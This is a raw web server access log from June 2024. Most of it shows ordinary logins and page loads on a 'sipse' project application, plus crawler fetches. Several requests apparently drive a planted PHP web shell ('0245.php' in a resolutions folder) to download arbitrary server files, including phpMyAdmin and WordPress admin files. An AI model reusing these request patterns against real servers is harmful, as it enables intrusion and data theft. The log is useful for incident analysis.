47.128.55.92 - - [29/Jun/2024:09:33:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0826.pdf&ft=download HTTP/1.1" 200 364199
47.128.117.173 - - [29/Jun/2024:09:33:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=PMA.php&ft=download HTTP/1.1" 200 2127
47.128.44.40 - - [29/Jun/2024:09:33:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3391.pdf&ft=download HTTP/1.1" 200 323239
201.245.192.253 - - [29/Jun/2024:09:33:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:33:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:34:03 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12789
186.29.33.66 - - [29/Jun/2024:09:34:03 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.29.33.66 - - [29/Jun/2024:09:34:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.52.103 - - [29/Jun/2024:09:34:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3744.pdf&ft=download HTTP/1.1" 200 343719
186.29.33.66 - - [29/Jun/2024:09:34:04 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.29.33.66 - - [29/Jun/2024:09:34:10 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 7225
186.29.33.66 - - [29/Jun/2024:09:34:11 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 17574
186.29.33.66 - - [29/Jun/2024:09:34:11 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
186.29.33.66 - - [29/Jun/2024:09:34:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:09:34:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0919.pdf HTTP/1.1" 200 344344
186.29.33.66 - - [29/Jun/2024:09:34:12 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
186.29.33.66 - - [29/Jun/2024:09:34:12 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
186.29.33.66 - - [29/Jun/2024:09:34:12 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.33.66 - - [29/Jun/2024:09:34:12 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.29.33.66 - - [29/Jun/2024:09:34:14 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
186.29.33.66 - - [29/Jun/2024:09:34:14 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2055
207.46.13.130 - - [29/Jun/2024:09:34:17 -0500] "GET /forest/ HTTP/1.1" 200 12041
186.29.33.66 - - [29/Jun/2024:09:34:15 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 80997
186.29.33.66 - - [29/Jun/2024:09:34:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.119.170 - - [29/Jun/2024:09:34:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4622.pdf&ft=download HTTP/1.1" 200 343719
186.29.33.66 - - [29/Jun/2024:09:34:25 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:34:25 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 59462
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:26 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:34:29 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45264
186.29.33.66 - - [29/Jun/2024:09:34:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:34:33 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1765
186.29.33.66 - - [29/Jun/2024:09:34:37 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1773
47.128.113.167 - - [29/Jun/2024:09:34:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=nav-menus.php&ft=download HTTP/1.1" 200 38832
66.249.66.11 - - [29/Jun/2024:09:34:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201501-1550/20021537.tif HTTP/1.1" 200 340848
